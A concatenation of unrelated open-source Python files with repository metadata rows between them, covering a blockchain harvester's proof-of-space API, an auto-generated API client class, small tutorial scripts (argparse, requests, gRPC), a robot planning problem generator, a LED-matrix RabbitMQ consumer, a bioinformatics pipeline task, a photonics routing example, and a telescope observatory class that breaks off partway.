self.harvester = harvester
def _set_state_changed_callback(self, callback: Callable):
self.harvester.state_changed_callback = callback
@api_request
async def harvester_handshake(self, harvester_handshake: harvester_protocol.HarvesterHandshake):
"""
Handshake between the harvester and farmer. The harvester receives the pool public keys,
as well as the farmer pks, which must be put into the plots, before the plotting process begins.
We cannot use any plots which have different keys in them.
"""
self.harvester.farmer_public_keys = harvester_handshake.farmer_public_keys
self.harvester.pool_public_keys = harvester_handshake.pool_public_keys
await self.harvester.refresh_plots()
if len(self.harvester.provers) == 0:
self.harvester.log.warning("Not farming any plots on this harvester. Check your configuration.")
return None
@peer_required
@api_request
async def new_signage_point_harvester(
self, new_challenge: harvester_protocol.NewSignagePointHarvester, peer: WSbeetConnection
):
"""
The harvester receives a new signage point from the farmer, this happens at the start of each slot.
The harvester does a few things:
1. The harvester applies the plot filter for each of the plots, to select the proportion which are eligible
for this signage point and challenge.
2. The harvester gets the qualities for each plot. This is approximately 7 reads per plot which qualifies.
Note that each plot may have 0, 1, 2, etc qualities for that challenge: but on average it will have 1.
3. Checks the required_iters for each quality and the given signage point, to see which are eligible for
inclusion (required_iters < sp_interval_iters).
4. Looks up the full proof of space in the plot for each quality, approximately 64 reads per quality
5. Returns the proof of space to the farmer
"""
if len(self.harvester.pool_public_keys) == 0 or len(self.harvester.farmer_public_keys) == 0:
# This means that we have not received the handshake yet
return None
start = time.time()
assert len(new_challenge.challenge_hash) == 32
# Refresh plots to see if there are any new ones
if start - self.harvester.last_load_time > self.harvester.plot_load_frequency:
await self.harvester.refresh_plots()
self.harvester.last_load_time = time.time()
loop = asyncio.get_running_loop()
def blocking_lookup(filename: Path, plot_info: PlotInfo) -> List[Tuple[bytes32, ProofOfSpace]]:
# Uses the DiskProver object to lookup qualities. This is a blocking call,
# so it should be run in a thread pool.
try:
plot_id = plot_info.prover.get_id()
sp_challenge_hash = ProofOfSpace.calculate_pos_challenge(
plot_id,
new_challenge.challenge_hash,
new_challenge.sp_hash,
)
try:
quality_strings = plot_info.prover.get_qualities_for_challenge(sp_challenge_hash)
except Exception as e:
self.harvester.log.error(f"Error using prover object {e}")
self.harvester.log.error(
f"File: {filename} Plot ID: {plot_id.hex()}, "
f"challenge: {sp_challenge_hash}, plot_info: {plot_info}"
)
return []
responses: List[Tuple[bytes32, ProofOfSpace]] = []
if quality_strings is not None:
difficulty = new_challenge.difficulty
sub_slot_iters = new_challenge.sub_slot_iters
if plot_info.pool_contract_puzzle_hash is not None:
# If we are pooling, override the difficulty and sub slot iters with the pool threshold info.
# This will mean more proofs actually get found, but they are only submitted to the pool,
# not the blockchain
for pool_difficulty in new_challenge.pool_difficulties:
if pool_difficulty.pool_contract_puzzle_hash == plot_info.pool_contract_puzzle_hash:
difficulty = pool_difficulty.difficulty
sub_slot_iters = pool_difficulty.sub_slot_iters
# Found proofs of space (on average 1 is expected per plot)
for index, quality_str in enumerate(quality_strings):
required_iters: uint64 = calculate_iterations_quality(
self.harvester.constants.DIFFICULTY_CONSTANT_FACTOR,
quality_str,
plot_info.prover.get_size(),
difficulty,
new_challenge.sp_hash,
)
sp_interval_iters = calculate_sp_interval_iters(self.harvester.constants, sub_slot_iters)
if required_iters < sp_interval_iters:
# Found a very good proof of space! will fetch the whole proof from disk,
# then send to farmer
try:
proof_xs = plot_info.prover.get_full_proof(
sp_challenge_hash, index, self.harvester.parallel_read
)
except Exception as e:
self.harvester.log.error(f"Exception fetching full proof for {filename}. {e}")
self.harvester.log.error(
f"File: {filename} Plot ID: {plot_id.hex()}, challenge: {sp_challenge_hash}, "
f"plot_info: {plot_info}"
)
continue
# Look up local_sk from plot to save locked memory
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(plot_info.prover.get_memo())
local_sk = master_sk_to_local_sk(local_master_sk)
include_taproot = plot_info.pool_contract_puzzle_hash is not None
plot_public_key = ProofOfSpace.generate_plot_public_key(
local_sk.get_g1(), farmer_public_key, include_taproot
)
responses.append(
(
quality_str,
ProofOfSpace(
sp_challenge_hash,
plot_info.pool_public_key,
plot_info.pool_contract_puzzle_hash,
plot_public_key,
uint8(plot_info.prover.get_size()),
proof_xs,
),
)
)
return responses
except Exception as e:
self.harvester.log.error(f"Unknown error: {e}")
return []
async def lookup_challenge(
filename: Path, plot_info: PlotInfo
) -> Tuple[Path, List[harvester_protocol.NewProofOfSpace]]:
# Executes a DiskProverLookup in a thread pool, and returns responses
all_responses: List[harvester_protocol.NewProofOfSpace] = []
if self.harvester._is_shutdown:
return filename, []
proofs_of_space_and_q: List[Tuple[bytes32, ProofOfSpace]] = await loop.run_in_executor(
self.harvester.executor, blocking_lookup, filename, plot_info
)
for quality_str, proof_of_space in proofs_of_space_and_q:
all_responses.append(
harvester_protocol.NewProofOfSpace(
new_challenge.challenge_hash,
new_challenge.sp_hash,
quality_str.hex() + str(filename.resolve()),
proof_of_space,
new_challenge.signage_point_index,
)
)
return filename, all_responses
awaitables = []
passed = 0
total = 0
for try_plot_filename, try_plot_info in self.harvester.provers.items():
try:
if try_plot_filename.exists():
# Passes the plot filter (does not check sp filter yet though, since we have not reached sp)
# This is being executed at the beginning of the slot
total += 1
if ProofOfSpace.passes_plot_filter(
self.harvester.constants,
try_plot_info.prover.get_id(),
new_challenge.challenge_hash,
new_challenge.sp_hash,
):
passed += 1
awaitables.append(lookup_challenge(try_plot_filename, try_plot_info))
except Exception as e:
self.harvester.log.error(f"Error plot file {try_plot_filename} may no longer exist {e}")
# Concurrently executes all lookups on disk, to take advantage of multiple disk parallelism
total_proofs_found = 0
for filename_sublist_awaitable in asyncio.as_completed(awaitables):
filename, sublist = await filename_sublist_awaitable
time_taken = time.time() - start
if time_taken > 5:
self.harvester.log.warning(
f"Looking up qualities on {filename} took: {time_taken}. This should be below 5 seconds "
f"to minimize risk of losing rewards."
)
else:
pass
# If you want additional logs, uncomment the following line
# self.harvester.log.debug(f"Looking up qualities on {filename} took: {time_taken}")
for response in sublist:
total_proofs_found += 1
msg = make_msg(ProtocolMessageTypes.new_proof_of_space, response)
await peer.send_message(msg)
now = uint64(int(time.time()))
farming_info = FarmingInfo(
new_challenge.challenge_hash,
new_challenge.sp_hash,
now,
uint32(passed),
uint32(total_proofs_found),
uint32(total),
)
pass_msg = make_msg(ProtocolMessageTypes.farming_info, farming_info)
await peer.send_message(pass_msg)
self.harvester.log.info(
f"{len(awaitables)} plots were eligible for farming {new_challenge.challenge_hash.hex()[:10]}..."
f" Found {total_proofs_found} proofs. Time: {time.time() - start:.5f} s. "
f"Total {len(self.harvester.provers)} plots"
)
@api_request
async def request_signatures(self, request: harvester_protocol.RequestSignatures):
"""
The farmer requests a signature on the header hash, for one of the proofs that we found.
A signature is created on the header hash using the harvester private key. This can also
be used for pooling.
"""
plot_filename = Path(request.plot_identifier[64:]).resolve()
try:
plot_info = self.harvester.provers[plot_filename]
except KeyError:
self.harvester.log.warning(f"KeyError plot {plot_filename} does not exist.")
return None
# Look up local_sk from plot to save locked memory
(
pool_public_key_or_puzzle_hash,
farmer_public_key,
local_master_sk,
) = parse_plot_info(plot_info.prover.get_memo())
local_sk = master_sk_to_local_sk(local_master_sk)
if isinstance(pool_public_key_or_puzzle_hash, G1Element):
include_taproot = False
else:
assert isinstance(pool_public_key_or_puzzle_hash, bytes32)
include_taproot = True
agg_pk = ProofOfSpace.generate_plot_public_key(local_sk.get_g1(), farmer_public_key, include_taproot)
# This is only a partial signature. When combined with the farmer's half, it will
# form a complete PrependSignature.
message_signatures: List[Tuple[bytes32, G2Element]] = []
for message in request.messages:
signature: G2Element = AugSchemeMPL.sign(local_sk, message, agg_pk)
message_signatures.append((message, signature))
response: harvester_protocol.RespondSignatures = harvester_protocol.RespondSignatures(
request.plot_identifier,
request.challenge_hash,
request.sp_hash,
local_sk.get_g1(),
farmer_public_key,
message_signatures,
)
return make_msg(ProtocolMessageTypes.respond_signatures, response)
@api_request
async def request_plots(self, _: harvester_protocol.RequestPlots):
plots_response = []
plots, failed_to_open_filenames, no_key_filenames = self.harvester.get_plots()
for plot in plots:
plots_response.append(
Plot(
plot["filename"],
plot["size"],
plot["plot_id"],
plot["pool_public_key"],
plot["pool_contract_puzzle_hash"],
plot["plot_public_key"],
plot["file_size"],
plot["time_modified"],
)
)
response = harvester_protocol.RespondPlots(plots_response, failed_to_open_filenames, no_key_filenames)
return make_msg(ProtocolMessageTypes.respond_plots, response)
| 49.105431 | 117 | 0.590046 |
a4be31e0900da710467865b5b3ef869c46f96125 | 1,063 | py | Python | JumpscaleLib/clients/itsyouonline/generated/client/AddIncludeSubOrgsOfReqBody.py | threefoldtech/jumpscale_lib9 | 03c1451133d777e5af106fcc6f75c1138bb997f2 | [
"Apache-2.0"
] | null | null | null | JumpscaleLib/clients/itsyouonline/generated/client/AddIncludeSubOrgsOfReqBody.py | threefoldtech/jumpscale_lib9 | 03c1451133d777e5af106fcc6f75c1138bb997f2 | [
"Apache-2.0"
] | 220 | 2018-07-29T08:37:17.000Z | 2019-08-05T15:01:27.000Z | JumpscaleLib/clients/itsyouonline/generated/client/AddIncludeSubOrgsOfReqBody.py | threefoldtech/jumpscale_lib9 | 03c1451133d777e5af106fcc6f75c1138bb997f2 | [
"Apache-2.0"
] | 1 | 2018-08-20T09:16:08.000Z | 2018-08-20T09:16:08.000Z | """
Auto-generated class for AddIncludeSubOrgsOfReqBody
"""
from six import string_types
from jumpscale import j
from . import client_support
class AddIncludeSubOrgsOfReqBody():
"""
auto-generated. don't touch.
"""
@staticmethod
def create(**kwargs):
"""
:type globalid: str
:rtype: AddIncludeSubOrgsOfReqBody
"""
return AddIncludeSubOrgsOfReqBody(**kwargs)
def __init__(self, json=None, **kwargs):
pass
if json is None and not kwargs:
raise ValueError('No data or kwargs present')
class_name = 'AddIncludeSubOrgsOfReqBody'
data = json or kwargs
# set attributes
data_types = [string_types]
self.globalid = client_support.set_property('globalid', data, data_types, False, [], False, True, class_name)
def __str__(self):
return self.as_json(indent=4)
def as_json(self, indent=0):
return client_support.to_json(self, indent=indent)
def as_dict(self):
return client_support.to_dict(self)
| 24.72093 | 117 | 0.650047 |
87581d07e4a5f55bb5cd744d1c0307c91f81198d | 530 | py | Python | docs/examples/expose_multiple_functions_as_commands/main.py | attilammagyar/argparse_action | f4dcaaa503560cea205b4baecd4c9a861cd7249e | [
"Apache-2.0"
] | 4 | 2021-03-01T12:05:45.000Z | 2022-01-22T10:03:29.000Z | docs/examples/expose_multiple_functions_as_commands/main.py | attilammagyar/argparse_action | f4dcaaa503560cea205b4baecd4c9a861cd7249e | [
"Apache-2.0"
] | 10 | 2020-12-20T14:58:29.000Z | 2022-01-23T20:09:29.000Z | docs/examples/expose_multiple_functions_as_commands/main.py | attilammagyar/argparse_action | f4dcaaa503560cea205b4baecd4c9a861cd7249e | [
"Apache-2.0"
] | 1 | 2022-01-21T22:18:05.000Z | 2022-01-21T22:18:05.000Z | "Expose multiple functions as commands"
import sys
import argparse
import argparse_action
def main():
namespace = parser.parse_args()
namespace.action(namespace)
parser = argparse.ArgumentParser(description=__doc__)
action = argparse_action.Action(parser)
@action.add()
def echo(parameter):
"echo the cli argument"
print(parameter)
@action.add()
def oche(parameter):
"echo the revered cli argument"
acc = list(parameter)
acc.reverse()
print("".join(acc))
if __name__ == "__main__":
main()
| 19.62963 | 53 | 0.715094 |
ba6e4377364366c5d29fc1b86775893cf9ca1bc4 | 5,640 | py | Python | opentamp/src/core/util_classes/hsr_prob_gen.py | Algorithmic-Alignment-Lab/openTAMP-legacy | 3b7c3be164cc968ad77a928286d6460cd70a670e | [
"MIT"
] | 2 | 2022-03-09T19:48:20.000Z | 2022-03-26T17:31:07.000Z | opentamp/src/core/util_classes/hsr_prob_gen.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | opentamp/src/core/util_classes/hsr_prob_gen.py | Algorithmic-Alignment-Lab/OpenTAMP | eecb950bd273da8cbed4394487630e8453f2c242 | [
"MIT"
] | null | null | null | from IPython import embed as shell
import itertools
import numpy as np
import random
import core.util_classes.hsr_constants as const
# SEED = 1234
NUM_PROBS = 1
NUM_OBJS = 1
NUM_SYMBOLS = NUM_OBJS
# filename = "hsr_probs/hsr.prob"
GOAL = "(HSRRobotAt hsr robot_end_pose)"
HSR_INIT_POSE = [0, 0, 0]
HSR_INIT_ARM = [0, 0, 0, 0, 0] # [0.5, -np.pi/2, 0, -np.pi/2, 0]
INT_GRIPPER = [const.GRIPPER_OPEN]
CLOSE_GRIPPER = [const.GRIPPER_CLOSE]
CAN_GEOM = [0.02, 0.02]
ROBOT_DIST_FROM_TABLE = 0.05
# TABLE_GEOM = [1.4, 1.4, 0.97/2]
TABLE_GEOM = [0.3, 0.6, 0.4/2]
# TABLE_POS = [0, 0, 0.97/2-0.375]
TABLE_POS = [1.75, 0.0, 0.4/2]
TABLE_ROT = [0,0,0]
def get_hsr_str(name, ARM = HSR_INIT_ARM, G = INT_GRIPPER, Pos = HSR_INIT_POSE):
s = ""
s += "(geom {})".format(name)
s += "(arm {} {}), ".format(name, ARM)
s += "(gripper {} {}), ".format(name, G)
s += "(pose {} {}), ".format(name, Pos)
return s
def get_robot_pose_str(name, ARM = HSR_INIT_ARM, G = INT_GRIPPER, Pos = HSR_INIT_POSE):
s = ""
s += "(arm {} {}), ".format(name, ARM)
s += "(gripper {} {}), ".format(name, G)
s += "(value {} {}), ".format(name, Pos)
return s
def get_undefined_robot_pose_str(name):
s = ""
s += "(arm {} undefined), ".format(name)
s += "(gripper {} undefined), ".format(name)
s += "(value {} undefined), ".format(name)
return s
def get_undefined_symbol(name):
s = ""
s += "(value {} undefined), ".format(name)
s += "(rotation {} undefined), ".format(name)
return s
def save_prob(filename, obstacles=[]):
s = "# AUTOGENERATED. DO NOT EDIT.\n# Configuration file for CAN problem instance. Blank lines and lines beginning with # are filtered out.\n\n"
s += "# The values after each attribute name are the values that get passed into the __init__ method for that attribute's class defined in the domain configuration.\n"
s += "Objects: "
s += "Robot (name {}); ".format("hsr")
for i in range(NUM_OBJS):
s += "Can (name can{0}); ".format(i)
s += "CanTarget (name can{0}_init_target); ".format(i)
s += "CanTarget (name can{0}_end_target); ".format(i)
s += "RobotPose (name {}); ".format("can_grasp_begin_{0}".format(i))
s += "RobotPose (name {}); ".format("can_grasp_end_{0}".format(i))
s += "RobotPose (name {}); ".format("can_putdown_begin_{0}".format(i))
s += "RobotPose (name {}); ".format("can_putdown_end_{0}".format(i))
s += "EEPose (name {}); ".format("cg_ee_{0}".format(i))
s += "EEPose (name {}); ".format("cp_ee_{0}".format(i))
s += "EEPose (name cg_ee); "
s += "EEPose (name cp_ee); "
s += "RobotPose (name {}); ".format("robot_init_pose")
s += "RobotPose (name {}); ".format("robot_end_pose")
s += "RobotPose (name {}); ".format("can_grasp_begin")
s += "RobotPose (name {}); ".format("can_grasp_end")
s += "RobotPose (name {}); ".format("can_putdown_begin")
s += "RobotPose (name {}); ".format("can_putdown_end")
s += "CanTarget (name {}); ".format("can_end_target")
for o in obstacles:
s += "Obstacle (name {}); ".format(o[0])
# s += "Obstacle (name {}); \n\n".format("table")
s += "\n\n"
s += "Init: "
s += get_hsr_str('hsr', HSR_INIT_ARM, INT_GRIPPER, HSR_INIT_POSE)
s += get_robot_pose_str('robot_init_pose', HSR_INIT_ARM, INT_GRIPPER, HSR_INIT_POSE)
s += get_undefined_robot_pose_str("can_grasp_begin")
s += get_undefined_robot_pose_str("can_grasp_end")
s += get_undefined_robot_pose_str("can_putdown_begin")
s += get_undefined_robot_pose_str("can_putdown_end")
s += get_undefined_symbol("cg_ee")
s += get_undefined_symbol("cp_ee")
for i in range(NUM_SYMBOLS):
s += get_undefined_robot_pose_str("can_grasp_begin_{0}".format(i))
s += get_undefined_robot_pose_str("can_grasp_end_{0}".format(i))
s += get_undefined_robot_pose_str("can_putdown_begin_{0}".format(i))
s += get_undefined_robot_pose_str("can_putdown_end_{0}".format(i))
s += get_undefined_symbol("cg_ee_{0}".format(i))
s += get_undefined_symbol("cp_ee_{0}".format(i))
for i in range(NUM_OBJS):
s += "(geom can{} {} {}), ".format(i, CAN_GEOM[0], CAN_GEOM[1])
s += "(pose can{} {}), ".format(i, [2, 2, 0])
s += "(rotation can{} {}),".format(i, [0, 0, 0])
s += "(value can{0}_init_target {1}), ".format(i, [0, 0, 0.615])
s += "(rotation can{0}_init_target {1}), ".format(i, [0, 0, 0])
s += "(value can{0}_end_target {1}), ".format(i, [0, 0, 0.615])
s += "(rotation can{0}_end_target {1}), ".format(i, [0, 0, 0])
s += get_undefined_robot_pose_str('robot_end_pose')
for o in obstacles:
s += "(geom {} {}), ".format(o[0], o[1])
s += "(pose {} {}), ".format(o[0], o[2])
s += "(rotation {} {}), ".format(o[0], o[3])
# s += "(geom table {}), ".format(TABLE_GEOM)
# s += "(pose table {}), ".format(TABLE_POS)
# s += "(rotation table {}); ".format(TABLE_ROT)
s += "(value can_end_target {0}), ".format([0, 0, 0.615])
s += "(rotation can_end_target {0}); ".format([0, 0, 0])
s += "(HSRRobotAt hsr robot_init_pose), "
s += "(HSRIsMP hsr), "
s += "(HSRWithinJointLimit hsr) \n\n"
# for i in range(NUM_OBJS):
# s += "(HSRCanGraspValid cg_ee_{0} can{0}_init_target), ".format(i)
# s += "(HSRCanGraspValid cp_ee_{0} can{0}_end_target), ".format(i)
# s += "(HSRStationaryW table) \n\n"
s += "Goal: {}".format(GOAL)
with open(filename, "w") as f:
f.write(s)
if __name__ == "__main__":
save_prob(filename)
| 37.350993 | 171 | 0.589184 |
ab0d66b457cbe33a8ad8d40d96a6c03fbdd9f1ae | 469 | py | Python | tutorials/python/essential-libraries/requests/2-handle-reqs.py | Fe-Nick-S/experiments | 9be65b9c97243aac6e50b95e5059667c423a47d8 | [
"MIT"
] | 2 | 2018-10-06T08:29:05.000Z | 2018-10-06T08:29:08.000Z | tutorials/python/essential-libraries/requests/2-handle-reqs.py | Fe-Nick-S/experiments | 9be65b9c97243aac6e50b95e5059667c423a47d8 | [
"MIT"
] | 2 | 2020-01-28T23:02:15.000Z | 2020-07-07T20:22:02.000Z | tutorials/python/essential-libraries/requests/2-handle-reqs.py | Fe-Nick-S/experiments | 9be65b9c97243aac6e50b95e5059667c423a47d8 | [
"MIT"
] | null | null | null |
import requests
# handle with status codes
resp = requests.get("https://httpbin.org/status/200")
print(resp.status_code)
resp = requests.get("https://httpbin.org/status/404")
print(resp.status_code)
#resp.raise_for_status()
# examine response encoding
resp = requests.get("https://httpbin.org/html")
print(resp.encoding)
print(resp.text)
print(resp.content)
# use json content
resp = requests.get("https://httpbin.org/json")
print(resp.json())
print(resp.headers)
| 21.318182 | 53 | 0.752665 |
65ce1cc22835116484e9e8d1fd3dab4f48c48f62 | 558 | py | Python | client.py | rvitorgomes/rpc18 | 10f2276fee2dd95e8cae4dc145bafd8fd520877c | [
"MIT"
] | null | null | null | client.py | rvitorgomes/rpc18 | 10f2276fee2dd95e8cae4dc145bafd8fd520877c | [
"MIT"
] | null | null | null | client.py | rvitorgomes/rpc18 | 10f2276fee2dd95e8cae4dc145bafd8fd520877c | [
"MIT"
] | null | null | null | import grpc
import time
# import the generated classes
import calculator_pb2
import calculator_pb2_grpc
# open a gRPC channel
channel = grpc.insecure_channel('localhost:50051')
# create a stub (client)
stub = calculator_pb2_grpc.CalculatorStub(channel)
# create a valid request message
number = calculator_pb2.Number(value=123465)
# start computing the call time
t0 = time.time()
# make the call
response = stub.SquareRoot(number)
t1 = time.time()
# return the time of the call
print(response.value)
print(format((t1-t0) * 1000, '.12f'), 'miliseconds') | 22.32 | 52 | 0.767025 |
896894868645dc633762b3c4ca9c6a092b96ce2c | 5,345 | py | Python | unicorn-hat/h5yr.py | CarlSargunar/FTC2021---Umbraco-Docker-Pi | 695e2cf9cb6b7ca7cf4e510313e5c931120af95a | [
"MIT"
] | null | null | null | unicorn-hat/h5yr.py | CarlSargunar/FTC2021---Umbraco-Docker-Pi | 695e2cf9cb6b7ca7cf4e510313e5c931120af95a | [
"MIT"
] | null | null | null | unicorn-hat/h5yr.py | CarlSargunar/FTC2021---Umbraco-Docker-Pi | 695e2cf9cb6b7ca7cf4e510313e5c931120af95a | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import pika, sys, os
import unicornhathd
import colorsys
import time
from sys import exit
try:
from PIL import Image, ImageDraw, ImageFont
except ImportError:
exit('This script requires the pillow module\nInstall with: sudo pip install pillow')
def showText(text):
# ========== Change the text you want to display, and font, here ================
TEXT = text
FONT = ('/usr/share/fonts/truetype/freefont/FreeSansBold.ttf', 10)
width, height = unicornhathd.get_shape()
unicornhathd.rotation(0)
unicornhathd.brightness(0.5)
# We want to draw our text 1 pixel in, and 2 pixels down from the top left corner
text_x = 1
text_y = 2
# Grab our font file and size as defined at the top of the script
font_file, font_size = FONT
# Load the font using PIL's ImageFont
font = ImageFont.truetype(font_file, font_size)
# Ask the loaded font how big our text will be
text_width, text_height = font.getsize(TEXT)
# Make sure we accommodate enough width to account for our text_x left offset
text_width += width + text_x
# Now let's create a blank canvas wide enough to accomodate our text
image = Image.new('RGB', (text_width, max(height, text_height)), (0, 0, 0))
# To draw on our image, we must use PIL's ImageDraw
draw = ImageDraw.Draw(image)
# And now we can draw text at our desited (text_x, text_y) offset, using our loaded font
draw.text((text_x, text_y), TEXT, fill=(255, 255, 255), font=font)
# To give an appearance of scrolling text, we move a 16x16 "window" across the image we generated above
# The value "scroll" denotes how far this window is from the left of the image.
# Since the window is "width" pixels wide (16 for UHHD) and we don't want it to run off the end of the,
# image, we subtract "width".
for scroll in range(text_width - width):
for x in range(width):
# Figure out what hue value we want at this point.
# "x" is the position of the pixel on Unicorn HAT HD from 0 to 15
# "scroll" is how far offset from the left of our text image we are
# We want the text to be a complete cycle around the hue in the HSV colour space
# so we divide the pixel's position (x + scroll) by the total width of the text
# If this pixel were half way through the text, it would result in the number 0.5 (180 degrees)
hue = (x + scroll) / float(text_width)
# Now we need to convert our "hue" value into r,g,b since that's what colour space our
# image is in, and also what Unicorn HAT HD understands.
# This list comprehension is just a tidy way of converting the range 0.0 to 1.0
# that hsv_to_rgb returns into integers in the range 0-255.
# hsv_to_rgb returns a tuple of (r, g, b)
br, bg, bb = [int(n * 255) for n in colorsys.hsv_to_rgb(hue, 1.0, 1.0)]
# Since our rainbow runs from left to right along the x axis, we can calculate it once
# for every vertical line on the display, and then re-use that value 16 times below:
for y in range(height):
# Get the r, g, b colour triplet from pixel x,y of our text image
# Our text is white on a black background, so these will all be shades of black/grey/white
# ie 255,255,255 or 0,0,0 or 128,128,128
pixel = image.getpixel((x + scroll, y))
# Now we want to turn the colour of our text - shades of grey remember - into a mask for our rainbow.
# We do this by dividing it by 255, which converts it to the range 0.0 to 1.0
r, g, b = [float(n / 255.0) for n in pixel]
# We can now use our 0.0 to 1.0 range to scale our three colour values, controlling the amount
# of rainbow that gets blended in.
# 0.0 would blend no rainbow
# 1.0 would blend 100% rainbow
# and anything in between would copy the anti-aliased edges from our text
r = int(br * r)
g = int(bg * g)
b = int(bb * b)
# Finally we colour in our finished pixel on Unicorn HAT HD
unicornhathd.set_pixel(width - 1 - x, y, r, g, b)
# Finally, for each step in our scroll, we show the result on Unicorn HAT HD
unicornhathd.show()
# And sleep for a little bit, so it doesn't scroll too quickly!
time.sleep(0.04)
def main():
connection = pika.BlockingConnection(pika.ConnectionParameters(host='192.168.0.144'))
channel = connection.channel()
channel.queue_declare(queue='hello')
def callback(ch, method, properties, body):
print(" [x] H5yr Received %r" % body)
showText(body)
channel.basic_consume(queue='hello', on_message_callback=callback, auto_ack=True)
print(" Starting h5yr_mq consumer ....")
print(' [*] Waiting for messages. To exit press CTRL+C')
channel.start_consuming()
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('Interrupted')
try:
sys.exit(0)
unicornhathd.off()
except SystemExit:
os._exit(0)
| 39.592593 | 117 | 0.62638 |
7f911b33404643ef23fa5f87a9b0afd47531d1bc | 597 | py | Python | src/pyphotonics/examples/autorouting2.py | rohanku/optics_lib | 54308416209bb797470d6a60eed7a39162598af5 | [
"BSD-3-Clause"
] | null | null | null | src/pyphotonics/examples/autorouting2.py | rohanku/optics_lib | 54308416209bb797470d6a60eed7a39162598af5 | [
"BSD-3-Clause"
] | null | null | null | src/pyphotonics/examples/autorouting2.py | rohanku/optics_lib | 54308416209bb797470d6a60eed7a39162598af5 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
from pyphotonics.layout.routing import (
user_route,
write_paths_to_gds,
Port,
WaveguideGeometry,
)
from pyphotonics.config import PATH
inputs = [Port(-11545.453, 2182.5 - 127 * i, 0) for i in range(3)]
outputs = [Port(-9435.453, 2055.5, np.pi), Port(-10695.453, 2055.5, 0)] + [
Port(-10463.728 + 254 * i, 1826.777, np.pi / 2) for i in range(1)
]
waveguides = user_route(
WaveguideGeometry(0.8),
[50, 62.75],
inputs=inputs,
outputs=outputs,
current_gds=PATH.example_autoroute,
)
write_paths_to_gds(waveguides, 'demo.gds' , layer=1111)
| 24.875 | 75 | 0.671692 |
57e1f840cbee2df9deaaeb1789230f830495a4d3 | 975 | py | Python | PyHive/TOPMed/MarkDuplicates.py | elowy01/igsr_analysis | ffea4885227c2299f886a4f41e70b6e1f6bb43da | [
"Apache-2.0"
] | 3 | 2018-04-20T15:04:34.000Z | 2022-03-30T06:36:02.000Z | PyHive/TOPMed/MarkDuplicates.py | elowy01/igsr_analysis | ffea4885227c2299f886a4f41e70b6e1f6bb43da | [
"Apache-2.0"
] | 7 | 2019-06-06T09:22:20.000Z | 2021-11-23T17:41:52.000Z | PyHive/TOPMed/MarkDuplicates.py | elowy01/igsr_analysis | ffea4885227c2299f886a4f41e70b6e1f6bb43da | [
"Apache-2.0"
] | 5 | 2017-11-02T11:17:35.000Z | 2021-12-11T19:34:09.000Z | """
Created on 21 March 2019
@author: galdam
"""
from typing import Dict
from Utils.RunSingularity import Singularity
class MarkDuplicates(Singularity):
"""
Runs the Mark Duplicates task in the broadinstitute/gtex_rnaseq singularity image.
"""
PIPELINE = 'markdups'
CMD_ARGS = ['bam_file', 'memory']
CMD = ("python3 -u /src/run_MarkDuplicates.py {bam_file} {PREFIX} -o {WORKING_DIR} --memory {memory}")
FILES = {
'md_bam_file': None,
'metrics': "{PREFIX}.marked_dup_metrics.txt"
}
def get_output_file_list(self) -> Dict[str, str]:
"""
The output BAM name follows an unconventional pattern.
The easiest way to incorporate this into the runnable is to override this function.
:return:
"""
out_bam = self.param('bam_file')
out_bam = out_bam.rsplit('.', 1)[0] + '.md.bam'
self.FILES['md_bam_file'] = out_bam
return super().get_output_file_list()
| 26.351351 | 106 | 0.64 |
5a73e08db63567e6676347de2cbcd532fc93164c | 27,289 | py | Python | src/panoptes/pocs/observatory.py | JAAlvarado-Montes/POCS | f475e1a75069bde9f72a631a99f432705d46b67b | [
"MIT"
] | null | null | null | src/panoptes/pocs/observatory.py | JAAlvarado-Montes/POCS | f475e1a75069bde9f72a631a99f432705d46b67b | [
"MIT"
] | null | null | null | src/panoptes/pocs/observatory.py | JAAlvarado-Montes/POCS | f475e1a75069bde9f72a631a99f432705d46b67b | [
"MIT"
] | null | null | null | import os
import subprocess
from collections import OrderedDict
from datetime import datetime
from astropy import units as u
from astropy.coordinates import get_moon
from astropy.coordinates import get_sun
from panoptes.pocs.base import PanBase
from panoptes.pocs.camera import AbstractCamera
from panoptes.pocs.dome import AbstractDome
from panoptes.pocs.images import Image
from panoptes.pocs.mount import AbstractMount
from panoptes.pocs.scheduler import BaseScheduler
from panoptes.pocs.utils.location import create_location_from_config
from panoptes.utils import current_time
from panoptes.utils import error
class Observatory(PanBase):
def __init__(self, cameras=None, scheduler=None, dome=None, mount=None, *args, **kwargs):
"""Main Observatory class
Starts up the observatory. Reads config file, sets up location,
dates and weather station. Adds cameras, scheduler, dome and mount.
"""
super().__init__(*args, **kwargs)
self.scheduler = None
self.dome = None
self.mount = None
self.logger.info('Initializing observatory')
# Setup information about site location
self.logger.info('Setting up location')
site_details = create_location_from_config()
self.location = site_details['location']
self.earth_location = site_details['earth_location']
self.observer = site_details['observer']
# Do some one-time calculations
now = current_time()
self._local_sun_pos = self.observer.altaz(now, target=get_sun(now)).alt # Re-calculated
self._local_sunrise = self.observer.sun_rise_time(now)
self._local_sunset = self.observer.sun_set_time(now)
self._evening_astro_time = self.observer.twilight_evening_astronomical(now, which='next')
self._morning_astro_time = self.observer.twilight_morning_astronomical(now, which='next')
# Set up some of the hardware.
self.set_mount(mount)
self.cameras = OrderedDict()
self._primary_camera = None
if cameras:
self.logger.info(f'Adding cameras to the observatory: {cameras}')
for cam_name, camera in cameras.items():
self.add_camera(cam_name, camera)
# TODO(jamessynge): Figure out serial port validation behavior here compared to that for
# the mount.
self.set_dome(dome)
self.set_scheduler(scheduler)
self.current_offset_info = None
self._image_dir = self.get_config('directories.images')
self.logger.success('Observatory initialized')
##########################################################################
# Helper methods
##########################################################################
def is_dark(self, horizon='observe', default_dark=-18 * u.degree, at_time=None):
"""If sun is below horizon.
Args:
horizon (str, optional): Which horizon to use, 'flat', 'focus', or
'observe' (default).
default_dark (`astropy.unit.Quantity`, optional): The default horizon
for when it is considered "dark". Default is astronomical twilight,
-18 degrees.
at_time (None or `astropy.time.Time`, optional): Time at which to
check if dark, defaults to now.
Returns:
bool: If it is dark or not.
"""
if at_time is None:
at_time = current_time()
horizon_deg = self.get_config(f'location.{horizon}_horizon', default=default_dark)
is_dark = self.observer.is_night(at_time, horizon=horizon_deg)
self._local_sun_pos = self.observer.altaz(at_time, target=get_sun(at_time)).alt
